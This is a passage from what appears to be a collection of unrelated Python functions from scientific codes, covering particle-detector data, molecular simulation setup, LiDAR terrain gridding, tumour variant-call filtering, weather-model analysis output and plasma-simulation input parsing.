var_z2 .append(var_z)\n touched_sipms2.append(len(pos2))\n true_r2 .append(r)\n\n else:\n var_phi2 .append(1.e9)\n var_z2 .append(1.e9)\n touched_sipms2.append(1.e9)\n true_r2 .append(1.e9)\n\n a_true_r1 = np.array(true_r1)\n a_true_r2 = np.array(true_r2)\n a_var_phi1 = np.array(var_phi1)\n a_var_phi2 = np.array(var_phi2)\n a_var_z1 = np.array(var_z1)\n a_var_z2 = np.array(var_z2)\n\n a_touched_sipms1 = np.array(touched_sipms1)\n a_touched_sipms2 = np.array(touched_sipms2)\n\n\n np.savez(output_file, a_true_r1=a_true_r1, a_true_r2=a_true_r2, a_var_phi1=a_var_phi1, a_var_phi2=a_var_phi2, a_var_z1=a_var_z1, a_var_z2=a_var_z2, a_touched_sipms1=a_touched_sipms1, a_touched_sipms2=a_touched_sipms2)", "def make_big_vdwradii( targetpath ):\n\n file = open( os.path.join( targetpath, 'vdwradii.dat'), 'w')\n text=\"\"\"; Very approximate VanderWaals radii\n; only used for drawing atoms as balls or for calculating atomic overlap.\n; longest matches are used\n; '???' or '*' matches any residue name\n; 'AAA' matches any protein residue name\n; MODIFIED TO USE BIG VDW RADII TO PREVENT WATERS BEING PUT IN THE PROTEIN WHERE WE DON'T WANT THEM. DLM\n??? C 0.3\n??? F 0.3\n??? H 0.3\n??? N 0.3\n??? O 0.3\n??? P 0.3\n??? S 0.3\n??? LP1 0\n??? LP2 0\nSOL H 0.04\nSOL O 0.105\nWAT H 0.04\nWAT O 0.105\nGLY MN1 0\nGLY MN2 0\nALA MCB1 0\nALA MCB2 0 \nVAL MCG1 0 \nVAL MCG2 0 \nILE MCG1 0 \nILE MCG2 0 \nILE MCD1 0 \nILE MCD2 0 \nLEU MCD1 0 \nLEU MCD2 0 \nMET MCE1 0 \nMET MCE2 0 \nTRP MTRP1 0 \nTRP MTRP2 0\nTHR MCG1 0\nTHR MCG2 0\nLYSH MNZ1 0 \nLYSH MNZ2 0 \n\"\"\" \n file.writelines(text)\n file.close()", "def filter_ground(jparams):\n\n # load las file and relevant parameters\n point_cloud = File(jparams['input-las'], mode='r')\n scale = point_cloud.header.scale[0]\n print(point_cloud.header.min)\n print('- Flattening point cloud')\n gridded_pc = point_cloud_to_grid(point_cloud=point_cloud, tf=jparams['thinning-factor'],\n cell_size=int(jparams['gf-cellsize'] / scale))\n\n ground_points, unprocessed_points, ll_origin = gridded_pc[0], gridded_pc[1], gridded_pc[2]\n\n print('- Growing terrain')\n dt = startin.DT()\n dt.insert(list(ground_points))\n dt = grow_terrain(tin=dt, p=unprocessed_points, gp=ground_points,\n max_distance=int(jparams['gf-distance'] / scale),\n max_angle=jparams['gf-angle'])\n\n print('- Writing point cloud')\n with File(jparams['output-las'], mode='w', header=point_cloud.header) as out_file:\n gp = dt.all_vertices()[1:]\n out_file.X = [p[0] for p in gp]\n out_file.Y = [p[1] for p in gp]\n out_file.Z = [p[2] for p in gp]\n\n print('- Creating raster (TIN)\\n\\t- Interpolating (TIN)')\n dg = tin_interp(tin=dt, cell_size=int(jparams['grid-cellsize'] / scale))\n\n print('\\t- Writing Esri Ascii (TIN)')\n write_asc(grid=np.rot90(dg[0]) * scale + point_cloud.header.min[2],\n cell_size=jparams['grid-cellsize'],\n fn=jparams['output-grid-tin'],\n origin=(point_cloud.header.min[0]+dg[1][0]*scale, point_cloud.header.min[1] + dg[1][1]*scale),\n depth=2)\n\n print('- Creating raster (IDW)\\n\\t- Interpolating (IDW)')\n ig = idw_interp(tin=dt, cell_size=int(jparams['grid-cellsize'] / scale),\n radius=jparams['idw-radius'] / scale, \n power=jparams['idw-power'])\n\n print('\\t- Writing Esri Ascii (IDW)')\n write_asc(grid=np.rot90(ig[0]) * scale + point_cloud.header.min[2],\n cell_size=jparams['grid-cellsize'],\n fn=jparams['output-grid-idw'],\n origin=(point_cloud.header.min[0]+ig[1][0]*scale, point_cloud.header.min[1]+ig[1][1]*scale),\n depth=2)\n\n return", "def process_radia_vcf(job, radia_vcf, work_dir, univ_options):\n radia_vcf = job.fileStore.readGlobalFile(radia_vcf)\n with open(radia_vcf, 'r') as infile, open(radia_vcf + 'radia_parsed.tmp', 'w') as outfile:\n # The columns in INFILE are\n # [0] CHROM\n # [1] POS\n # [2] ID\n # [3] REF\n # [4] ALT\n # [5] QUAL\n # [6] FILTER\n # [7] INFO\n # [8] FORMAT\n # [9] DNA_NORMAL\n # [10] DNA_TUMOR\n # [11] RNA_TUMOR - Not always present\n for line in infile:\n # Print header to outfile\n if line.startswith('#'):\n print(line.strip(), file=outfile)\n continue\n line = line.strip().split('\\t')\n # If the call was not PASSing, or if the call was germline: skip\n if line[6] != 'PASS' or 'MT=GERM' in line[7]:\n continue\n # If there is just 1 ALT allele, print and continue\n if len(line[4]) == 1:\n print('\\t'.join(line), file=outfile)\n # If not, process\n else:\n seq_field_indeces = [9, 10]\n alleles = [line[3]] + line[4].split(',') # all alleles, incl. REF\n # collect tumor, normal and (if present) rna AD and AFs\n # AD = Depth of reads supporting each allele\n # AF = Fraction of reads supporting each allele\n # normal_ad = line[9].split(':')[5].split(',')\n normal_af = line[9].split(':')[6].split(',')\n tumor_ad = line[10].split(':')[5].split(',')\n tumor_af = line[10].split(':')[6].split(',')\n if len(line[11]) > 1:\n rna_ad = line[11].split(':')[5].split(',')\n rna_af = line[11].split(':')[6].split(',')\n seq_field_indeces += [11] # append rna since it is present\n else:\n # If rna is missing, set RNA_AD and RNA_AF to null sets for easily\n # integrating into the logic in the following code\n rna_ad = rna_af = [0, 0, 0, 0]\n # Initialise variables to store the probable ALT alleles and the index values of\n # the same wrt AD and AF\n out_alleles = set([])\n out_af_ad_index = {0}\n # parse AD and AF to get most probable ALT alleles\n for i in range(1, len(normal_af)):\n # Criteria for selection = AD > 4 and AF >0.1 in either tumor or RNA, given\n # normal AF < 0.1\n if ((float(tumor_af[i]) >= 0.1 and int(tumor_ad[i]) >= 4) or\n (float(rna_af[i]) >= 0.1 and int(rna_ad[i]) >= 4)) and \\\n (float(normal_af[i]) < 0.1):\n out_alleles.add(alleles[i])\n out_af_ad_index.add(i)\n # If the number of probable alleles is greater than 0 the print to outfile with\n # the modified allele fraction representing reads corrresponding to all alleles\n if len(out_alleles) > 0:\n line[4] = ','.join(out_alleles) # set alt alleles\n # Modify the AD and AF values in the TUMOR/NORMAL/RNA fields\n # one at a time. Seq fields contain\n # [0] GT* - Genotype\n # [1] DP - Read depth at this position in the sample\n # [2] INDEL - Number of indels\n # [3] START - Number of reads starting at this position\n # [4] STOP - Number of reads stopping at this position\n # [5] AD* - Depth of reads supporting alleles\n # [6] AF* - Fraction of reads supporting alleles\n # [7] BQ* - Avg base quality for reads supporting alleles\n # [8] SB* - Strand Bias for reads supporting alleles\n # Fields marked with *s are teh ones that contain info for each seq field\n # and need to be modified\n for seq_field_index in seq_field_indeces:\n # Get the details for seq_field\n deets = line[seq_field_index].split(':')\n # modify fields 5 thu 8 to hold only info for the probable\n # alleles\n for field_index in range(5, 9):\n field = deets[field_index].split(\",\")\n deets[field_index] = \",\".join([x for i, x in enumerate(field)\n if i in out_af_ad_index])\n # Modify DP to hold the new total of reads\n deets[1] = str(sum([int(x) for x in deets[5].split(\",\")]))\n # get the most likely genotypes based on AD and AF\n gt_by_ad = set([i for i, x in enumerate(deets[5].split(\",\"))\n if int(x) >= 4])\n gt_by_af = set([i for i, x in enumerate(deets[6].split(\",\"))\n if float(x) >= 0.1])\n # Get the consensus genotype\n genotype = gt_by_ad.intersection(gt_by_af)\n if len(genotype) == 0:\n deets[0] = \"0/0\"\n elif len(genotype) == 1:\n deets[0] = \"/\".join([str(x) for x in genotype] +\n [str(x) for x in genotype])\n elif len(genotype) == 2:\n deets[0] = \"/\".join([str(x) for x in genotype])\n else:\n print(\"ERROR : triple genotype detected\", file=sys.stderr)\n print(line, file=sys.stdout)\n # Rejoin the details line\n line[seq_field_index] = \":\".join(deets)\n # Print the modified line to output\n print(\"\\t\".join(line), file=outfile)\n # Else do nothing\n else:\n pass\n return outfile.name", "def loadGeoTransform(filepath):\n \n from osgeo import gdal\n \n ds = gdal.Open(filepath, 0)\n \n return ds.GetGeoTransform()", "def generate_resfile_from_pdb(pdbfilename, resfilename, input_sc = True ):\n\tp = rosetta.core.import_pose.pose_from_file(pdbfilename)\n\tgenerate_resfile_from_pose(p, resfilename, input_sc)", "def postTTUWRFanalysis(inpath, outpath,\n refpath='/lustre/research/bancell/aucolema/HWT2016runs/2016050800/wrfoutREF'):\n # Pull analysis variables\n og_analysis = Dataset(inpath)\n anlvars = og_analysis.variables['T'][0]\n gph300 = anlvars[0,:,:]\n gph500 = anlvars[1,:,:]\n gph700 = anlvars[2,:,:]\n gph850 = anlvars[3,:,:]\n gph925 = anlvars[4,:,:]\n temp300 = anlvars[5,:,:]\n temp500 = anlvars[6,:,:]\n temp700 = anlvars[7,:,:]\n temp850 = anlvars[8,:,:]\n temp925 = anlvars[9,:,:]\n u300 = anlvars[10,:,:]\n u500 = anlvars[11,:,:]\n u700 = anlvars[12,:,:]\n u850 = anlvars[13,:,:]\n u925 = anlvars[14,:,:]\n v300 = anlvars[15,:,:]\n v500 = anlvars[16,:,:]\n v700 = anlvars[17,:,:]\n v850 = anlvars[18,:,:]\n v925 = anlvars[19,:,:]\n td300 = anlvars[20,:,:]\n td500 = anlvars[21,:,:]\n td700 = anlvars[22,:,:]\n td850 = anlvars[23,:,:]\n td925 = anlvars[24,:,:]\n q300 = anlvars[25,:,:]\n q500 = anlvars[26,:,:]\n q700 = anlvars[27,:,:]\n q850 = anlvars[28,:,:]\n q925 = anlvars[29,:,:]\n slp = anlvars[30,:,:]\n t2 = anlvars[31,:,:]\n td2 = anlvars[32,:,:]\n u10 = anlvars[33,:,:]\n v10 = anlvars[34,:,:]\n\n wrf_d1 = Dataset(refpath)\n lons, lats = wrf_d1.variables['XLONG'][0], wrf_d1.variables['XLAT'][0]\n wrf_idim = len(lons[0,:])\n wrf_jdim = len(lats[:,0])\n\n sensvarlist = [gph300,gph500,gph700,gph850,gph925,temp300,temp500,temp700,\n temp850,temp925,u300,u500,u700,u850,u925,v300,\n v500,v700,v850,v925,td300,td500,td700,td850,\n td925,q300,q500,q700,q850,q925,slp,t2,td2,u10,v10]\n sensstringslist = [\"300 hPa GPH\",\"500 hPa GPH\",\"700 hPa GPH\",\n \"850 hPa GPH\",\"925 hPa GPH\",\"300 hPa T\",\"500 hPa T\",\n \"700 hPa T\",\"850 hPa T\",\"925 hPa T\",\"300 hPa U-Wind\",\n \"500 hPa U-Wind\",\"700 hPa U-Wind\",\"850 hPa U-Wind\",\n \"925 hPa U-Wind\",\"300 hPa V-Wind\",\"500 hPa V-Wind\",\n \"700 hPa V-Wind\",\"850 hPa V-Wind\",\"925 hPa V-Wind\",\n \"300 hPa Dewpt\", \"500 hPa Dewpt\", \"700 hPa Dewpt\",\n \"850 hPa Dewpt\", \"925 hPa Dewpt\", \"300 hPa Q\",\n \"500 hPa Q\", \"700 hPa Q\", \"850 hPa Q\", \"925 hPa Q\",\n \"SLP\",\"2m Temp\",\"2m Dewpt\",\n \"10m U-Wind\",\"10m V-Wind\"]\n\n\n # Write interpolated variables to netCDF\n new_analysis = Dataset(outpath, \"w\", format=\"NETCDF4\")\n new_analysis.createDimension('lat', wrf_jdim)\n new_analysis.createDimension('lon', wrf_idim)\n new_analysis.createDimension('time', None)\n xlat = new_analysis.createVariable(\"XLAT\", float, dimensions=('lat','lon'))\n xlat[:,:] = lats\n xlon = new_analysis.createVariable(\"XLONG\", float, dimensions=('lat','lon'))\n xlon[:,:] = lons\n\n # Interpolate and save!!\n for i in range(len(sensvarlist)):\n var = new_analysis.createVariable(sensstringslist[i].replace(\" \",\"_\"),\n sensvarlist[i].dtype,\n dimensions=('lat','lon'))\n var[:,:] = sensvarlist[i]\n new_analysis.close()\n return", "def postTTUWRFanalysis(inpath, outpath,\n refpath='/lustre/research/bancell/aucolema/HWT2016runs/2016050800/wrfoutREF'):\n # Pull analysis variables\n og_analysis = Dataset(inpath)\n anlvars = og_analysis.variables['T'][0]\n gph300 = anlvars[0,:,:]\n gph500 = anlvars[1,:,:]\n gph700 = anlvars[2,:,:]\n gph850 = anlvars[3,:,:]\n gph925 = anlvars[4,:,:]\n temp300 = anlvars[5,:,:]\n temp500 = anlvars[6,:,:]\n temp700 = anlvars[7,:,:]\n temp850 = anlvars[8,:,:]\n temp925 = anlvars[9,:,:]\n u300 = anlvars[10,:,:]\n u500 = anlvars[11,:,:]\n u700 = anlvars[12,:,:]\n u850 = anlvars[13,:,:]\n u925 = anlvars[14,:,:]\n v300 = anlvars[15,:,:]\n v500 = anlvars[16,:,:]\n v700 = anlvars[17,:,:]\n v850 = anlvars[18,:,:]\n v925 = anlvars[19,:,:]\n td300 = anlvars[20,:,:]\n td500 = anlvars[21,:,:]\n td700 = anlvars[22,:,:]\n td850 = anlvars[23,:,:]\n td925 = anlvars[24,:,:]\n q300 = anlvars[25,:,:]\n q500 = anlvars[26,:,:]\n q700 = anlvars[27,:,:]\n q850 = anlvars[28,:,:]\n q925 = anlvars[29,:,:]\n slp = anlvars[30,:,:]\n t2 = anlvars[31,:,:]\n td2 = anlvars[32,:,:]\n u10 = anlvars[33,:,:]\n v10 = anlvars[34,:,:]\n\n wrf_d1 = Dataset(refpath)\n lons, lats = wrf_d1.variables['XLONG'][0], wrf_d1.variables['XLAT'][0]\n wrf_idim = len(lons[0,:])\n wrf_jdim = len(lats[:,0])\n\n sensvarlist = [gph300,gph500,gph700,gph850,gph925,temp300,temp500,temp700,\n temp850,temp925,u300,u500,u700,u850,u925,v300,\n v500,v700,v850,v925,td300,td500,td700,td850,\n td925,q300,q500,q700,q850,q925,slp,t2,td2,u10,v10]\n sensstringslist = [\"300 hPa GPH\",\"500 hPa GPH\",\"700 hPa GPH\",\n \"850 hPa GPH\",\"925 hPa GPH\",\"300 hPa T\",\"500 hPa T\",\n \"700 hPa T\",\"850 hPa T\",\"925 hPa T\",\"300 hPa U-Wind\",\n \"500 hPa U-Wind\",\"700 hPa U-Wind\",\"850 hPa U-Wind\",\n \"925 hPa U-Wind\",\"300 hPa V-Wind\",\"500 hPa V-Wind\",\n \"700 hPa V-Wind\",\"850 hPa V-Wind\",\"925 hPa V-Wind\",\n \"300 hPa Dewpt\", \"500 hPa Dewpt\", \"700 hPa Dewpt\",\n \"850 hPa Dewpt\", \"925 hPa Dewpt\", \"300 hPa Q\",\n \"500 hPa Q\", \"700 hPa Q\", \"850 hPa Q\", \"925 hPa Q\",\n \"SLP\",\"2m Temp\",\"2m Dewpt\",\n \"10m U-Wind\",\"10m V-Wind\"]\n\n\n # Write interpolated variables to netCDF\n new_analysis = Dataset(outpath, \"w\", format=\"NETCDF4\")\n new_analysis.createDimension('lat', wrf_jdim)\n new_analysis.createDimension('lon', wrf_idim)\n new_analysis.createDimension('time', None)\n xlat = new_analysis.createVariable(\"XLAT\", float, dimensions=('lat','lon'))\n xlat[:,:] = lats\n xlon = new_analysis.createVariable(\"XLONG\", float, dimensions=('lat','lon'))\n xlon[:,:] = lons\n\n # Interpolate and save!!\n for i in range(len(sensvarlist)):\n var = new_analysis.createVariable(sensstringslist[i].replace(\" \",\"_\"),\n sensvarlist[i].dtype,\n dimensions=('lat','lon'))\n var[:,:] = sensvarlist[i]\n new_analysis.close()\n return", "def inputfile(filename):\n infile = open(filename, 'r')\n lines = infile.readlines()\n\n # --------------------------------------------------------------------------\n # Domain specifications\n\n Nx = eval(lines[15][lines[15].find('=')+1:].strip())\n ax = eval(lines[16][lines[16].find('=')+1:].strip())\n bx = eval(lines[17][lines[17].find('=')+1:].strip())\n\n Ny = eval(lines[19][lines[19].find('=')+1:].strip())\n ay = eval(lines[20][lines[20].find('=')+1:].strip())\n by = eval(lines[21][lines[21].find('=')+1:].strip())\n\n Nz = eval(lines[23][lines[23].find('=')+1:].strip())\n az = eval(lines[24][lines[24].find('=')+1:].strip())\n bz = eval(lines[25][lines[25].find('=')+1:].strip())\n\n Nvx = eval(lines[27][lines[27].find('=')+1:].strip())\n avx = eval(lines[28][lines[28].find('=')+1:].strip())\n bvx = eval(lines[29][lines[29].find('=')+1:].strip())\n\n Nvy = eval(lines[31][lines[31].find('=')+1:].strip())\n avy = eval(lines[32][lines[32].find('=')+1:].strip())\n bvy = eval(lines[33][lines[33].find('=')+1:].strip())\n\n Nvz = eval(lines[35][lines[35].find('=')+1:].strip())\n avz = eval(lines[36][lines[36].find('=')+1:].strip())\n bvz = eval(lines[37][lines[37].find('=')+1:].strip())\n\n Nt = eval(lines[39][lines[39].find('=')+1:].strip())\n T = eval(lines[40][lines[40].find('=')+1:].strip())\n\n N = eval(lines[46][lines[46].find('=')+1:].strip())\n\n # --------------------------------------------------------------------------\n # list of phase space variables used, in etc/params.dat must set unused\n # vars to have Nz as None, z = x, vx, y, ...\n # e.g. in 1D1V, phasespace_vars = ['x', 'vx']\n phasespace_vars = []\n if Nx is not None:\n phasespace_vars.append('x')\n if Ny is not None:\n phasespace_vars.append('y')\n if Nz is not None:\n phasespace_vars.append('z')\n if Nvx is not None:\n phasespace_vars.append('vx')\n if Nvy is not None:\n phasespace_vars.append('vy')\n if Nvz is not None:\n phasespace_vars.append('vz')\n\n # ==========================================================================\n # Boundary conditions dictionary -- contains dist. function BCs as well as phi\n\n BC = {}\n BC['f'] = {}\n BC['phi'] = {}\n\n # BC['f'] = BC dict on distribution function f\n\n # BC['f']['x'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['f']['y'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['f']['z'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['f']['vx'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['f']['vy'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['f']['vz'] = {'lower' : lower_value, 'upper' : upper_value}\n\n # BC['phi'] = BC dict on electric potential phi\n\n # BC['phi']['x'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['phi']['y'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['phi']['z'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['phi']['vx'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['phi']['vy'] = {'lower' : lower_value, 'upper' : upper_value}\n # BC['phi']['vz'] = {'lower' : lower_value, 'upper' : upper_value}\n #\n # subdict objects that give keyword descriptions that match method names in lib.boundaryconditions and lib.fieldsolvers\n # include, for var in phasespace_vars:\n #\n # BC['f'][var]['type'] and BC['phi'][var]['type']\n #\n # these are used to assemble function handle strings that select the corresponding routine needed for the specified BCs\n\n\n BC_infilename = './etc/' + lines[106][lines[106].find(':')+1:].strip()\n BC_infile = open(BC_infilename, 'r')\n BC_infile_lines = BC_infile.readlines()\n\n # DECSKS will throw an error if numbers are inputted as BCs in etc/params.dat\n\n # strings are stored as lowercase as they are used in an eval statement to access\n # the relevant method in lib.boundaryconditions. e.g. 'absorbing' is accessed as\n # either eval('lib.boundaryconditions.absorbing_lower_boundary') or\n # eval('lib.boundaryconditions.absorbing_upper_boundary') in lib.convect.remap_step\n\n BC['f']['x'] = {}\n BC['f']['x']['lower'] = safe_eval(BC_infile_lines[40][BC_infile_lines[40].find('=')+1:].strip())\n BC['f']['x']['upper'] = safe_eval(BC_infile_lines[41][BC_infile_lines[41].find('=')+1:].strip())\n\n BC['f']['y'] = {}\n BC['f']['y']['lower'] = safe_eval(BC_infile_lines[43][BC_infile_lines[43].find('=')+1:].strip())\n BC['f']['y']['upper'] = safe_eval(BC_infile_lines[44][BC_infile_lines[44].find('=')+1:].strip())\n\n BC['f']['z'] = {}\n BC['f']['z']['lower'] = safe_eval(BC_infile_lines[46][BC_infile_lines[46].find('=')+1:].strip())\n BC['f']['z']['upper'] = safe_eval(BC_infile_lines[47][BC_infile_lines[47].find('=')+1:].strip())\n\n BC['f']['vx'] = {}\n BC['f']['vx']['lower'] = safe_eval(BC_infile_lines[55][BC_infile_lines[55].find('=')+1:].strip())\n BC['f']['vx']['upper'] = safe_eval(BC_infile_lines[56][BC_infile_lines[56].find('=')+1:].strip())\n\n BC['f']['vy'] = {}\n BC['f']['vy']['lower'] = safe_eval(BC_infile_lines[58][BC_infile_lines[58].find('=')+1:].strip())\n BC['f']['vy']['upper'] = safe_eval(BC_infile_lines[59][BC_infile_lines[59].find('=')+1:].strip())\n\n BC['f']['vz'] = {}\n BC['f']['vz']['lower'] = safe_eval(BC_infile_lines[61][BC_infile_lines[61].find('=')+1:].strip())\n BC['f']['vz']['upper'] = safe_eval(BC_infile_lines[62][BC_infile_lines[62].find('=')+1:].strip())\n\n # make all BCs lowercase strings so they can be used to construct the function strings in lib.boundaryconditions module\n # whose names are all lowercase\n\n # if an accepted boundary condition synonym as been used, change value to the name it goes by in lib.boundaryconditions\n # check that all inputs for evolved phase space variables are recognized keywords and are compatible with the\n # boundary at which they are indicated\n for var in phasespace_vars:\n for boundary in ['lower', 'upper']:\n BC['f'][var][boundary] = BC['f'][var][boundary].lower()\n if BC['f'][var][boundary] == 'open' or BC['f'][var][boundary] == 'cutoff':\n print \"\\nCourtesy notice to user: the boundary condition %s was selected for the distribution function on %s at the %s boundary in params_boundaryconditions.dat; \" % (BC['f'][var][boundary].upper(), var, boundary)\n print \"this is a recognized input synonym for a '%s' condition. Changing value stored to BC['f']['%s']['%s'] = '%s'\\n\" % ('ABSORBING', var, boundary, 'ABSORBING')\n print \"Please regard any warnings/error messages that cite the keyword '%s' with this change in mind\\n\" % ('ABSORBING')\n BC['f'][var][boundary] = 'absorbing'\n\n elif BC['f'][var][boundary] == 'collector':\n pass\n\n elif BC['f'][var][boundary] == 'absorbing':\n pass\n\n elif BC['f'][var][boundary] == 'symmetry':\n if boundary == 'upper':\n raise NotImplementedError('a symmetric UPPER boundary condition on the distribution function was specified in params_boundaryconditions.dat; however, DECSKS only has functionality to permit lower boundary symmetry.')\n elif boundary == 'lower':\n print \"\\nCourtesy notice to user: the boundary condition %s was selected for the distribution function on %s at the %s boundary in params_boundaryconditions.dat; \" % (BC['f'][var][boundary].upper(), var, boundary)\n print \"this is a recognized input synonym for a '%s' condition. Changing value stored to BC['f']['%s']['%s'] = '%s'\\n\" % ('SYMMETRIC', var, boundary, 'SYMMETRIC')\n print \"Please regard any warnings/error messages that cite the keyword '%s' with this change in mind\\n\" % ('SYMMETRIC')\n BC['f'][var][boundary] = 'symmetric'\n\n elif BC['f'][var][boundary] == 'symmetric':\n if boundary == 'lower':\n pass\n elif boundary == 'upper':\n raise NotImplementedError('a symmetric UPPER boundary condition on the distribution function was specified in params_boundaryconditions.dat; however, DECSKS only has functionality to permit lower boundary symmetry.')\n\n elif BC['f'][var][boundary] == 'periodic':\n pass\n\n else: # inputs do not match any options\n print '\\nThe invalid keyword %s was specified in params_boundaryconditions.dat on the variable %s at the %s boundary\\n' % (BC['f'][var][boundary].upper(), var, boundary)\n raise InputError('inputs are restricted to those listed as options in params_boundaryconditions.dat')\n\n # above we have checked for valid input. Next, check for compatible inputs (if 'periodic' is selected, it must be selected for both\n # upper and lower bounds) and store a descriptor that toggles the correct orchestrator\n # function in lib.boundaryconditions module ('periodic' vs. 'nonperiodic')\n for var in phasespace_vars:\n if BC['f'][var]['lower'] == 'periodic' and BC['f'][var]['upper'] == 'periodic':\n BC['f'][var]['type'] = 'periodic'\n\n elif BC['f'][var]['lower'] == 'symmetric' and BC['f'][var]['upper'] != 'periodic':\n BC['f'][var]['type'] = 'nonperiodic'\n \n # check for invalid inputs\n elif BC['f'][var]['lower'] == 'symmetric' and BC['f'][var]['upper'] == 'periodic':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat:\"\n print \"\\nlower boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['lower'].upper())\n print \"upper boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['upper'].upper())\n\n print \"\\nare inconsistent. Cannot combine a symmetric lower boundary with a periodic upper boundary condition. Periodic boundary conditions involve both boundaries (both boundaries would have to be set to PERIODIC)\\n\"\n\n raise InputError('cannot combine a symmetric lower boundary condition with a periodic upper boundary condition for the distribution function. Check inputs in boundaryconditions.dat and change the upper bound to be of non-periodic type')\n\n elif BC['f'][var]['lower'] == 'periodic' and BC['f'][var]['upper'] != 'periodic':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat:\"\n print \"\\nlower boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['lower'].upper())\n print \"upper boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['upper'].upper())\n\n print \"\\nare inconsistent. Cannot combine periodic and non-periodic boundary conditions on same variable for distribution function, check inputs in params_boundaryconditions.dat')\"\n\n raise InputError('cannot combine periodic and non-periodic boundary conditions on same variable for distribution function, check inputs in params_boundaryconditions.dat')\n elif BC['f'][var]['lower'] != 'periodic' and BC['f'][var]['upper'] == 'periodic':\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat:\"\n print \"\\nlower boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['lower'].upper())\n print \"upper boundary condition on f for the variable %s: %s\" % (var, BC['f'][var]['upper'].upper())\n\n print \"\\nare inconsistent. Cannot combine periodic and non-periodic boundary conditions on same variable for distribution function, check inputs in params_boundaryconditions.dat')\"\n\n raise InputError('cannot combine periodic and non-periodic boundary conditions on same variable for distribution function, check inputs in params_boundaryconditions.dat')\n else: # boundary conditions are combination of only: symmetric (lower), collector (lower or upper), absorbing (lower or upper)\n BC['f'][var]['type'] = 'nonperiodic'\n\n distribution_function_boundarycondition_orchestrator_prefix = 'DECSKS.lib.boundaryconditions'\n\n # create a dictionary of function handles that call either\n # the 'periodic', 'nonperiodic', or 'symmetric' orchestrator in lib.boundaryconditions\n #\n # i.e. we form the string handle for each active variable var:\n #\n # distribution_function_boundarycondition_orchestrator_handle[var] =\n #\n # DECSKS.lib.boundaryconditions.periodic\n # DECSKS.lib.boundaryconditions.nonperiodic\n # DECSKS.lib.boundaryconditions.symmetric\n\n distribution_function_boundarycondition_orchestrator_handle = {}\n\n for var in phasespace_vars:\n distribution_function_boundarycondition_orchestrator_handle[var] = \".\".join(\n (distribution_function_boundarycondition_orchestrator_prefix, BC['f'][var]['type']))\n\n # --------------------------------------------------------------------------\n # Store number of active gridpoints for every phase space variable\n #\n # Note: for periodic BCs: Nz_active = Nz - 1, we evolve Nz_active nodes and assign by periodicity the f[Nz-1] = f[0]\n # for all other BCs: Nz_active = Nz\n\n # active_dims vs. total_dims\n # note a generalized loop cannot be used as assignments cannot be made under an assembled string with eval\n if BC['f']['x']['lower'] == 'periodic' and BC['f']['x']['upper'] == 'periodic' and Nx is not None:\n Nx_active = Nx - 1\n else:\n Nx_active = Nx\n\n if BC['f']['y']['lower'] == 'periodic' and BC['f']['y']['upper'] == 'periodic' and Ny is not None:\n Ny_active = Ny - 1\n else:\n Ny_active = Ny\n\n if BC['f']['z']['lower'] == 'periodic' and BC['f']['z']['upper'] == 'periodic' and Nz is not None:\n Nz_active = Nz - 1\n else:\n Nz_active = Nz\n\n if BC['f']['vx']['lower'] == 'periodic' and BC['f']['vx']['upper'] == 'periodic' and Nvx is not None:\n Nvx_active = Nvx - 1\n else:\n Nvx_active = Nvx\n\n if BC['f']['vy']['lower'] == 'periodic' and BC['f']['vy']['upper'] == 'periodic' and Nvy is not None:\n Nvy_active = Nvy - 1\n else:\n Nvy_active = Nvy\n\n if BC['f']['vz']['lower'] == 'periodic' and BC['f']['vz']['upper'] == 'periodic' and Nvz is not None:\n Nvz_active = Nvz - 1\n else:\n Nvz_active = Nvz\n\n # --------------------------------------------------------------------------\n # High order correction (HOC) method applied to each phase space variable\n\n # store as uppercase\n\n HOC = {}\n HOC['x'] = safe_eval(lines[56][lines[56].find(':')+1:].strip())\n HOC['y'] = safe_eval(lines[57][lines[57].find(':')+1:].strip())\n HOC['z'] = safe_eval(lines[58][lines[58].find(':')+1:].strip())\n\n HOC['vx'] = safe_eval(lines[60][lines[60].find(':')+1:].strip())\n HOC['vy'] = safe_eval(lines[61][lines[61].find(':')+1:].strip())\n HOC['vz'] = safe_eval(lines[62][lines[62].find(':')+1:].strip())\n\n # make all non-None inputs capitalized\n for key in HOC.keys():\n if HOC[key] is not None:\n HOC[key] = HOC[key].upper()\n else:\n pass\n\n # check for valid inputs\n for key in HOC.keys():\n if HOC[key] is not None:\n if type(HOC[key]) != str:\n raise InputError('A non-string entry was found as a high order correction specification. Only FD or FOURIER are accepted')\n elif HOC[key] != 'FD' and HOC[key] != 'FOURIER':\n print \"\\nThe following high order correction was specified in params.dat, but is not recognized:\"\n print \"\\nHigh order correction on %s: %s\\n\" % (key, HOC[key].upper())\n print \"only FD and FOURIER are accepted keywords\\n\"\n raise InputError('An unrecognized high order correction was specified. Only FD or FOURIER are accepted')\n\n elif HOC[key] == 'FOURIER' and BC['f'][key]['type'] != 'periodic': # Fourier corrections use trigonometric derivatives, which rely on periodicity of the underlying functions\n print \"\\nThe following boundary conditions specified in params_boundaryconditions.dat:\"\n print \"\\nlower boundary condition on f for the variable %s: %s\" % (key, BC['f'][key]['lower'].upper())\n print \"upper boundary condition on f fore the variable %s: %s\\n\\n\" % (key, BC['f'][key]['upper'].upper())\n\n print \"are inconsistent with the high order correction specified in params.dat:\"\n print \"\\nhigh order correction on %s: %s\\n\\n\" % (key, HOC[var].upper())\n\n print \"FOURIER high order corrections only make sense for periodic systems (if this is the intention, the BCs on f and phi must be set to PERIODIC in params_boundaryconditions.dat)\\n\"\n\n raise InputError('Fourier corrections on a variable only make sense for periodic systems. The boundary conditions on the distribution function were read-in as not periodic for this variable.')\n elif eval('N' + key) is None:\n raise InputError('a variable not involved in the simulation (its number of grid points was specified as None) must also have its high order correction method specified as None. While reading 